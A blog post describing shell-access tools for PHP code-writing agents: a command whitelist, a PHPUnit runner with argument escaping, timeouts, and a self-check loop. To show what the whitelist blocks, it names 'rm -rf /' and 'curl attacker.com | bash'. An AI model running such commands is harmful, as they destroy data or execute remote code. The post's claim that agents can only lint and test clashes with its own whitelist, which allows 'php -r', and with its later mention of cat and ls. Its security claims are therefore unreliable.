BashTool and RunTestsTool: Self-Check Loops for Code-Writing Agents

Why only VajbCoder and TestAgent get shell access — BashTool's allowed command whitelist (php -l, phpunit, phpstan), RunTestsTool for targeted PHPUnit execution, and the write-lint-test-fix self-check loop that catches errors before human review.

Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.


BashTool: Whitelisted Shell Access

BashTool allows command execution, but only specific commands:

private const ALLOWED_COMMANDS = [
    'php -l',           // Syntax check
    'php -r',           // Quick PHP execution
    'phpunit',          // Test execution
    'phpstan',          // Static analysis
    'composer',         // Dependency info (not install)
    'git diff',         // See changes
    'git status',       // Check state
    'git log',          // History
];

Every command is checked against this whitelist before execution. An agent can't run rm -rf / or curl attacker.com | bash. It can only lint, test, analyze, and inspect.

Who Gets BashTool

Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).

The reasoning: VajbCoder writes code and needs to verify it compiles. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.


The Write-Lint-Test-Fix Loop

VajbCoder's typical iteration pattern:

Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
             If error: read error, fix code, go to step 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
             If fail: read failure, fix code, go to step 2
Iteration 5: phpstan analyze newfile.php → static analysis
             If errors: fix type hints, go to step 2
Iteration 6: generate_patch (or confirm done) → auto-exit

The self-check loop catches three categories of errors:

  1. Syntax errorsphp -l catches missing semicolons, unmatched braces

  2. Logic errorsphpunit catches wrong behavior, broken assertions

  3. Type errorsphpstan catches missing type hints, null safety issues


Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.


RunTestsTool

A specialized tool for TestAgent:

public function execute(array $params): array
{
    $testFile = $params['file'] ?? null;     // Specific test file
    $filter = $params['filter'] ?? null;     // --filter pattern
    $suite = $params['suite'] ?? null;       // --testsuite name

    $command = 'php vendor/bin/phpunit';
    if ($testFile !== null) $command .= ' ' . escapeshellarg($testFile);
    if ($filter !== null) $command .= ' --filter ' . escapeshellarg($filter);
    if ($suite !== null) $command .= ' --testsuite ' . escapeshellarg($suite);

    // Execute with timeout
    $output = $this->executeWithTimeout($command, 120);

    return ['success' => $this->parseSuccess($output), 'content' => $output];
}

Parameters are escaped with escapeshellarg() — no command injection through test file names or filter patterns.

TestAgent's Loop

Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
             If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass

TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.


Command Timeout

Both tools enforce execution timeouts:

private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
    $process = proc_open($command, $descriptors, $pipes);
    // ... read output with timeout ...
    if ($elapsedSeconds > $timeoutSeconds) {
        proc_terminate($process);
        return "Command timed out after {$timeoutSeconds}s";
    }
}

Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough to prevent infinite loops.


Why Not Give Every Agent BashTool

Shell access is the most powerful tool. An agent with BashTool can:

  • Read any file (via cat)

  • List directories (via ls)

  • Check git history (via git log)

  • Run arbitrary PHP (via php -r)


Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.

The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.


Up Next

Next up: ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory — how KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.

Comments (0)

No comments yet. Be the first to share your thoughts!

Leave a Comment

Recent Posts